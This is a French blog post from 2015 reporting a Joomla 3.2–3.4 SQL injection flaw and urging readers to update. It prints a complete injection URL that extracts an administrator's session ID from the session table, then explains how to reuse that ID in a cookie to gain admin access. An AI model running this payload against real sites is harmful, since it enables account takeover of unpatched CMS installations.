Nouvelle faille de sécurité dans Joomla: injection SQL
lundi 26 octobre 2015 à 21:21Une très grosse faille de sécurité concernant Joomla, l’un des spécialistes de la gestion de contenu en ligne vient d’être rendue publique. En effet, elle est très facilement exploitable et permet d’accéder à l’interface d’administration de n’importe quel site utilisant ce CMS en version 3.2 à 3.4.
Cette faille permet des injections SQL. Autant dire qu’elle sont très graves. La meilleure solution pour contrer cette faille de sécurité est de mettre à jour votre site avec la version la plus récente proposée sur le site officiel : www.joomla.org
La faille a été découverte par deux chercheurs, l’un appartenant à la société Trustwave et l’autre à la société PerimeterX, deux sociétés spécialisées en cybersécurité.
Sur le site de Trustwave, on retrouve une analyse plus poussée de cette faille de sécurité. Cependant pour l’exploiter, il suffit d’injecter une formule SQL dans l’URL du site web cible (ajoutez l’adresse du site web au début) :
index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=73&type_id=1&list[select]=(select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM jml_session where userid=30 LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
Ici on récupère les variables de session ID de l’administrateur du site.
Une session c’est quoi ? Une session est un mécanisme technique permettant de sauvegarder temporairement sur le serveur des informations relatives à l’authentification d’un internaute.
En collant la session ID qu’on a extraite, à la section du cookie dans la requête permettant d’accéder au dossier administrateur on peut disposer des droits d’administration et accéder au panneau de contrôle.
En résumé cette faille elle ne fonctionne que dans le cas ou un administrateur est connecté au site au moment de l’attaque, afin de permettre à l’attaquant de récupérer l’identifiant de sa session et de prendre sa place.
Enfin, si vous utilisez Joomla, je vous conseille de faire attention et de le mettre à jour rapidement.
Ceux qui ont aimé cet article ont également apprécié ceux-là :
- Les 10 failles de sécurité les plus critiques en 2013
- Changer le mot de passe de session Windows sans le connaitre
- Joomscan: Comment detecter les failles d’un site joomla ?
- WPScan : Détecter les vulnérabilités d’un site WordPress
- Comment exploiter la faille 0day d’Internet Explorer avec Metasploit
- Pirater un site Web avec Kali Linux en moins de 4 minutes
- Comment exploiter une faille XSS avec le framework Beef ?
- Wifi Map: la solution pour avoir Internet gratuit partout dans le monde
- Auto-destruction de vos données avec Kali Linux
- Protéger votre site web contre les failles de sécurité
- Un hacker Palestinien a piraté le compte de Mark Zuckerberg
- 5 astuces pour garder vos données en toute sécurité
- Comment choisir un mot de passe sécurisé ?
- Que faire si mon site à été piraté ?
- Sécuriser votre pc avec une clé USB
- Vérifiez la sécurité d’un proxy avec de l’utiliser
- Vous n’êtes plus anonyme en utilisant un proxy ou un VPN
- Websecurify: Scanne votre site contre les dernières vulnérabilités
- Sortie de Kali Linux, le successeur de Backtrack 6
- Hacker un compte Facebook avec l’outil Reconnect